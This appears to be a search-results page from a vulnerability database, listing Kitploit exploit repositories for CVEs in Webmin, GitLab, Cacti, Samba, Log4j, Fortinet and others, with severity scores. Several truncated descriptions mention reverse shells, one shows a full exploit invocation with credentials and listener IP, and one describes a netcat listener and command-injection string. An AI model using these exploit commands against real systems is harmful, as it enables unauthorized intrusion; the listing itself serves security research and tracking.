Lucene search
+L

8650 matches found

Kitploit
Kitploit
added 2026/09/09 12:35 p.m.10 views

yealink_tools

Ingeniería inversa del firmware de Yealink Este repositorio contiene algunas utilidades de script utilizadas durante la ingeniería inversa del firmware de los teléfonos VoIP de Yealink. Para obtener más información sobre esta investigación, lea la entrada del blog...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/09 11:56 a.m.5 views

Rainstorm

================================================================================================ BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234. Developer : Andy Yang Version : 0.1.0 License :...

10CVSS8.1AI score0.99999EPSS
SaveExploits146
Kitploit
Kitploit
added 2026/09/09 11:55 a.m.7 views

PoC-CVE-2019-12840

Exploit for CVE-2019-12840 in Webmin This repository contains a Python script that exploits the CVE-2019-12840 vulnerability in Webmin. Description The script attempts to log in to a Webmin server and then exploit the CVE-2019-12840 vulnerability. The script accepts several command-line arguments...

9CVSS7.9AI score0.77835EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/09 11:54 a.m.4 views

CVE-2021-44228

Log4Shell 概念验证 此仓库是 CVE-2021-44228 漏洞的概念验证。 它衍生自此仓库。 在此仓库中,我制作了一个易受攻击的应用程序示例,并演示了如何利用该漏洞。 概念验证组件 我已修改上游 Python 脚本,以自动化生成此漏洞。 此仓库中有两个 Dockerfile,可方便使用,如下所示: Docker-Ldap 在此 Docker 镜像中,我们从我的 Google Drive 下载 java jdk-8u20,因为您需要在 Oracle 上注册账号才能下载。 如果您不信任此来源,可以修改 Dockerfile 中的下载文件,并从此处下载 jdk(确保下载适用于...

10CVSS7.4AI score0.99999EPSS
SaveExploits368References2
Kitploit
Kitploit
added 2026/09/09 11:46 a.m.9 views

ClearML-CVE-2024-24590

root@kitploit: / | | | / | | | \ / \ / | | | | | | \ / | | | | | | | | | | | | |/ / | '| |/| | | | /| | | | | | || | / | | | | | | | | | | | || | | |||,|| || ||| || / | - 2024-24590 x OxyDe ClearML Pickle Artifact Upload PoC This project demonstrates how to dynamically upload a pickle...

8.8CVSS7.8AI score0.02473EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/09 11:40 a.m.7 views

gitlab-cve-2021-22205

gitlab-cve-2021-22205 A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab Usage root@kitploit: Usage: cve-2021-22205.sh options Options: -h,--help Show this help -t,--target Set the target server i.e. "http://gitlab.example.com" -i,--reverse-ip Set the IP to...

10CVSS8.2AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/09 11:36 a.m.8 views

CVE-2022-46169_POC

Exploit For CVE-2022-46169 Getting Reverse Shell root@kitploit: cactiexploit.py...

9.8CVSS8.5AI score0.99826EPSS
SaveExploits48
Kitploit
Kitploit
added 2026/09/09 11:36 a.m.5 views

cve-2022-42475-Fortinet

cve-2022-42475 POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon Usage pip install pwntools To use this code, you can save it in a file, say exploit.py, and then run it with Python in the command line, passing in the required arguments. Here's an example command to run the exploit...

9.8CVSS8.4AI score0.99474EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/09 10:59 a.m.7 views

CVE-2018-5955

CVE-2018-5955 An exploit for CVE-2018-5955 GitStack 2.3.10 Unauthenticated RCE Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution Date: 18.01.2018 Software Link: https://gitstack.com/ Exploit Author: Kacper Szurek Original Exploit: https://www.exploit-db.com/exploits/43777 Website:...

9.8CVSS8.3AI score0.81433EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/09 10:59 a.m.3 views

CVE-2007-2447-RCE

This exploit helps you to get a reverse shell, exploting Samba 3.0.20 3.0.25 · When executing the script with python3 with the --help parameter, it asks us for a series of parameters root@kitploit: --lhost LHOST your host ip where the shell will be received --lport LPORT your port port where the...

6CVSS8AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/09 10:59 a.m.6 views

CVE-2021-31762

..| CVE-2021-31762 |.. Description : Exploiting a Cross-site request forgery CSRF attack to create a privileged user through the Webmin's add users feature then getting a reverse shell through the Webmin's running process feature Tested Version : Webmin 1.973 GitHub's latest version 07/03/2021...

8.8CVSS7.9AI score0.0878EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/09 10:54 a.m.8 views

OffensivePascal-CVE-2010-2075

CVE-2010-2075 FreePascal 实现的 CVE-2010-2075 漏洞利用 漏洞信息 UnrealIRCd 3.2.8.1 通过向任意监听服务发送 "AB; command" 实现远程代码执行(RCE)。发送的任何命令都将以 UnrealIRCD 运行的用户身份执行。 此实现会向你的监听器发起一个反向 shell。 步骤 1 启动一个监听器,例如 netcat -lvp 4444 步骤 2 执行漏洞利用 ./exploit ,其中 host ip 和 port 是你的监听器运行的地址和端口。 依赖要求 Synapse。如果你没有安装,可以通过 OPM 进行安装。...

7.5CVSS5.9AI score0.83534EPSS
SaveExploits15
Kitploit
Kitploit
added 2026/09/09 10:43 a.m.5 views

CVE-2020-15227

CVE-2020-15227 DISCLAIMER! I take no responsibility of using it in wild life environment so please do NOT do it. This thingy is just to demonstrate and for test things for sysadmins I made this exploit according to publishing a CVE of David Grudl The founder of Nette foundation As a security...

9.8CVSS8.2AI score0.34424EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/09 10:41 a.m.8 views

webmin_cve-2019-12840_poc

webmincve-2019-12840poc A standalone POC for CVE-2019-12840. Below will send back a reverse shell on port 443 root@kitploit: $ python3 CVE-2019-12840.py -u https://192.168.122.10 -U matt -P Secret123 -lhost 192.168.122.1 -lport 443 / \ \ / / | | \ / / |/ \ / | \ / | || | / \ | | \ \ / /| | | | |...

9CVSS8AI score0.77835EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/09 10:38 a.m.5 views

PyUsernameMapScriptRCE

PyUsernameMapScriptRCE CVE-2007-2447 exploit written in python to get reverse shell...

6CVSS8.1AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/09 10:34 a.m.6 views

EFS_CVE-2021-43217

EFS Bypass VulnerabilityCVE-2021-43217 Objective This vulnerability demonstration aimed to establish a controlled environment for simulating an EFS bypass on windows 10 through Kali Linux. The primary focus was to perform a vulnerability pentration and show the possiblity of controlling a desktop...

9.8CVSS8.3AI score0.06419EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/09 10:26 a.m.4 views

CVE-2021-41773-Playground

CVE-2021-41773-Playground Some docker images to play with CVE-2021-41773 and CVE-2021-42013 run docker compose up -d to spin up all the containers. Servers will run on ports 8080, 8081, 8082, and 8083. 8080 contains an Apache 2.4.49 with CGI disabled. 8081 contains an Apache 2.4.49 with CGI...

9.8CVSS8AI score0.99992EPSS
SaveExploits191
Kitploit
Kitploit
added 2026/09/09 10:26 a.m.8 views

CVE-2023-422-Chamilo-LMS-RCE

Prerequisites root@kitploit: pip install requests Information The python script uses the vulnerability CVE-2023-422 to upload a file into the server and uses that file to send a reverse shell to the netcat listener and all this can be done without being authenticated. However, you will need to...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/09 10:26 a.m.5 views

CVE-2023-27163-AND-Mailtrail-v0.53

Automatic Exploit Summary The following exploit abuses Requests Baskets v1.2.1 SSRF vulnerability to forward the internal application running at 127.0.0.1:80 to the external application at /pwned. Once the Mailtrail v0.53 application has been forwarded it will execute a reverse shell command...

6.5CVSS6.8AI score0.06591EPSS
SaveExploits29References2
Kitploit
Kitploit
added 2026/09/09 10:24 a.m.20 views

MySQL-Fu.rb

MySQL-Fu.rb MySQL-Fu is a Ruby based MySQL Client Script I wrote. It does most of the stuff a normal MySQL client might do: SQL Shell, Update/Delete/Drop Database/Table, Add/Delete Users, Dump Databases/Table w/ option for gzip...... Plus a few extra options to make life a little easier for...

6CVSS5.9AI score0.31664EPSS
SaveExploits16
Rows per page
Query Builder